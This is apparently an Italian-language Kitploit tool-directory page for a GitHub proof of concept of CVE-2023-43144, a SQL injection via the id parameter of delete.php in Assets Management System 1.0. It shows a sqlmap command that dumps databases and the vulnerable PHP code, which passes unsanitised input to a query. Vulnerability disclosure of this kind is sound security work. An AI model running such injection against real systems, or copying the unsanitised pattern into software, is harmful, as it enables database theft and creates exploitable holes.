Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43144 — Assets Management System 1.0 è vulnerabile a SQL injection tramite il parametro id in delete.php | Kitploit
Strumenti/GitHubGitHub/pegasus0xx/cve-2023-43144
Analisi delle VulnerabilitàAnalisi del CodiceExploitSicurezza WebSicurezza dei Database
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

Assets Management System 1.0 è vulnerabile a SQL injection tramite il parametro id in delete.php

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-43144

Descrizione

Assets Management System 1.0 è vulnerabile a SQL injection tramite il parametro id in delete.php

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Revisione del codice (delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

Non c'è alcuna validazione o sanitizzazione della variabile $id. Ciò significa che qualsiasi valore fornito da un utente come parametro id verrà utilizzato direttamente nella query SQL

Scarica lo strumento